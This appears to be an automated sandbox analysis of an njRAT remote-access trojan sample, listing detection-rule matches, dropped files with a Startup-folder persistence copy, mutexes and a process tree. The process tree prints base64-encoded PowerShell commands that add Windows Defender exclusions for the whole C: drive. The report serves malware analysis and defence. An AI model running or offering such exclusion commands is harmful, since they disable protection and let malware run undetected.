Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ac83ca.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.13560788.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000000.1505405429.0000000000472000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.1619630469.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000F.00000002.1646811109.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi

Source: classification engine

Classification label: mal100.phis.bank.troj.adwa.spyw.expl.evad.winEXE@38/29@5/4

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AD86 AdjustTokenPrivileges,	15_2_00A7AD86
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AD4F AdjustTokenPrivileges,	15_2_00A7AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAD86 AdjustTokenPrivileges,	20_2_006BAD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAD4F AdjustTokenPrivileges,	20_2_006BAD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AD86 AdjustTokenPrivileges,	24_2_00A5AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AD4F AdjustTokenPrivileges,	24_2_00A5AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AD86 AdjustTokenPrivileges,	25_2_00D3AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AD4F AdjustTokenPrivileges,	25_2_00D3AD4F
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AD86 AdjustTokenPrivileges,	26_2_0095AD86
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AD4F AdjustTokenPrivileges,	26_2_0095AD4F

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3828:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\c382eb151c59bd833b24120723eac541

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted

Jump to behavior

Source: virus.exe.bin.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: virus.exe.bin.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\virus.exe.bin.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: virus.exe.bin.exe	ReversingLabs: Detection: 66%
Source: virus.exe.bin.exe	Virustotal: Detection: 65%

Source: javaw.exe	String found in binary or memory: H[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: H[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: C@(ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: C@(ZD)[Ljavafx/scene/paint/Stop;
Source: javaw.exe	String found in binary or memory: twccom/sun/javafx/application/LauncherImpl$$Lambda$54
Source: javaw.exe	String found in binary or memory: com/sun/javafx/application/LauncherImpl$$Lambda$48

Source: C:\Users\user\Desktop\virus.exe.bin.exe

File read: C:\Users\user\Desktop\virus.exe.bin.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\virus.exe.bin.exe "C:\Users\user\Desktop\virus.exe.bin.exe"
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
